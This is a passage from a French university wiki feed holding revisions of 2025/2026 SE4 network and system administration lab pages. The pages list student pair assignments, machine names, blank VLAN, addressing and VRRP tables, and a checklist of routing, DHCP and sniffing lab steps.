| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| || Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| || || Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| || || Cédric PAYET &amp;amp; Thomas DELOBELLE&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| || || Aurèle VANGHELUWE &amp;amp; Tom MERIEN&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;X.Y.Z.A&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 ||&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11231</id>
		<title>SE4 IdO sécurité système/réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_IdO_s%C3%A9curit%C3%A9_syst%C3%A8me/r%C3%A9seau_2025/2026&amp;diff=11231"/>
		<updated>2026-01-20T13:15:57Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;= Répartition des binômes pour les travaux pratiques &amp;quot;administration système et réseau&amp;quot; =&lt;br /&gt;
&lt;br /&gt;
Préfixe des noms de machine : &amp;lt;code&amp;gt;SE4&amp;lt;/code&amp;gt;.&lt;br /&gt;
&lt;br /&gt;
Domaines Internet à louer sur [[gandi.net]]. Identifiant &amp;lt;code&amp;gt;pifou&amp;lt;/code&amp;gt;. Regardez le montant prévu sur le compte avant de louer un domaine.&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Cahier !! Elève !! Nom de domaine&lt;br /&gt;
! Nom de machine de services !! Nom de machine mandataire&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E1 | Cahier n°1]] || Pierre CASIMIRI || || SE4.Merteuil||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E2 | Cahier n°2]] || Agathe HOUDUSSE || || SE4.Valmont||SE4.Rosemonde&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E3 | Cahier n°3]] || Lilia GHAZALI || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E4 | Cahier n°4]] || Marin GOURVEST || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E5 | Cahier n°5]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E6 | Cahier n°6]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E7 | Cahier n°7]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E8 | Cahier n°8]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E9 | Cahier n°9]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E10 | Cahier n°10]] || Tom MERIEN || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E11 | Cahier n°11]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E12 | Cahier n°12]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E13 | Cahier n°13]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E14 | Cahier n°14]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
| [[Atelier SysRes SE4 2025/2026 E15 | Cahier n°15]] || Prénom NOM || || ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom machine mandataire !! IPv4 publique machine mandataire !! Elèves &lt;br /&gt;
|-&lt;br /&gt;
| SE4.Rosemonde|| || Pierre CASIMIRI &amp;amp; Agathe HOUDUSSE&lt;br /&gt;
|-&lt;br /&gt;
| || || Lilia GHAZALI &amp;amp; Marin GOURVEST&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
| || || Prénom NOM &amp;amp; Prénom NOM&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des commutateurs virtuels =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom du fichier de configuration !! Réseau IPv4 utilisé &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Tableau des réseaux virtuels =&lt;br /&gt;
&lt;br /&gt;
VLAN privés :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
VLAN communs avec l'école :&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom !! Numéro &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
= Schéma de câblage =&lt;br /&gt;
&lt;br /&gt;
Vous avez des éléments réseaux et des panneaux de brassage fibres dans les locaux techniques SR31 et SR52 ainsi que dans les salles E304 et E306.&lt;br /&gt;
&lt;br /&gt;
Le plan doit donc comporter, pour chaque connexion, les locaux d'origine et de destination ainsi que l'identifiant des ports d'origine et de destination.&lt;br /&gt;
&lt;br /&gt;
= Plan d'adressage =&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Nom VLAN !! Réseau IPv4 !! Réseau IPv6 &lt;br /&gt;
|-&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= Informations VRRP =&lt;br /&gt;
&lt;br /&gt;
Pour chaque VLAN et pour chaque instance VRRP dans le VLAN listez les adresses IPv4 propres ainsi que l'unique IPv4 virtuelle.&lt;br /&gt;
&lt;br /&gt;
== VLAN des machines virtuelles ==&lt;br /&gt;
&lt;br /&gt;
Une seule instance VRRP dans le VLAN des machines virtuelles.&lt;br /&gt;
&lt;br /&gt;
Adresse IPv4 virtuelle : &amp;lt;code&amp;gt;X.Y.Z.A&amp;lt;/code&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Routeur !! IPv4 propre &lt;br /&gt;
|-&lt;br /&gt;
| C9200 E304 ||&lt;br /&gt;
|- &lt;br /&gt;
| C9200 E306 ||&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== VLAN ... ==&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
	<entry>
		<id>https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_construction_de_r%C3%A9seau_2025/2026&amp;diff=10525</id>
		<title>SE4 construction de réseau 2025/2026</title>
		<link rel="alternate" type="text/html" href="https://wiki-se.plil.fr/mediawiki/index.php?title=SE4_construction_de_r%C3%A9seau_2025/2026&amp;diff=10525"/>
		<updated>2025-10-08T12:00:39Z</updated>

		<summary type="html">&lt;p&gt;Tmerien : /* Promotion SE4_SI */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;__TOC__&lt;br /&gt;
&lt;br /&gt;
= Avancement des élèves sur le TP de construction réseau pour 2025/2026 =&lt;br /&gt;
&lt;br /&gt;
== Promotion SE4_SI ==&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! N° réseau !! N° tiroir !! Elèves || Machines&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 1 || G1 || Mario Sylainx S. GAUTHIER || reuze01, bimberlot01&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 2 || G2 || Prénom NOM || reuze02, bimberlot02&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 3 || G3 || Prénom NOM || reuze03, bimberlot03&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 4 || G4 || Aurèle VANGHELUWE || reuze04, bimberlot04&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 5 || G5 || Prénom NOM || reuze05, bimberlot05&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 6 || G6 || Evora Souop || reuze06, bimberlot06&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 7 || G7 || Cédric PAYET || reuze11, bimberlot11&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 8 || G8 || Agathe HOUDUSSE || reuze12, bimberlot12&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 9 || G9 || Tom MERIEN || reuze13, bimberlot13&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 10 || G10 || Lilia GHAZALI || reuze14, bimberlot14&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 11 || G11 || Prénom NOM || reuze15, bimberlot15&lt;br /&gt;
|-&lt;br /&gt;
| Groupe 12 || G12 || Prénom NOM || reuze16, bimberlot16&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot;&lt;br /&gt;
! Etape !! Vérification par l'intervenant&lt;br /&gt;
|-&lt;br /&gt;
| Commutation même VLAN filaire || &lt;br /&gt;
|-&lt;br /&gt;
| Accès &amp;lt;code&amp;gt;ssh&amp;lt;/code&amp;gt; au routeur ||&lt;br /&gt;
|-&lt;br /&gt;
| Routage entre VLAN filaires ||&lt;br /&gt;
|-&lt;br /&gt;
| Visibilité des réseaux WiFi (test smartphone) ||&lt;br /&gt;
|-&lt;br /&gt;
| Fonctionnement du serveur DHCP (test smartphone) || &lt;br /&gt;
|-&lt;br /&gt;
| Routage entre VLAN WiFi et filaires ||&lt;br /&gt;
|-&lt;br /&gt;
| Routage inter-réseaux ||&lt;br /&gt;
|-&lt;br /&gt;
| Routage Internet méthode 1 || &lt;br /&gt;
|-&lt;br /&gt;
| Routage Internet méthode 2 ||&lt;br /&gt;
|-&lt;br /&gt;
| Routage Internet méthode 3 ||&lt;br /&gt;
|-&lt;br /&gt;
| Reniflage réseau HTTP/HTTPS telnet/SSH||&lt;br /&gt;
|-&lt;br /&gt;
| Manipulation des protocoles HTTP et SMTP ||&lt;br /&gt;
|}&lt;/div&gt;</summary>
		<author><name>Tmerien</name></author>
	</entry>
</feed>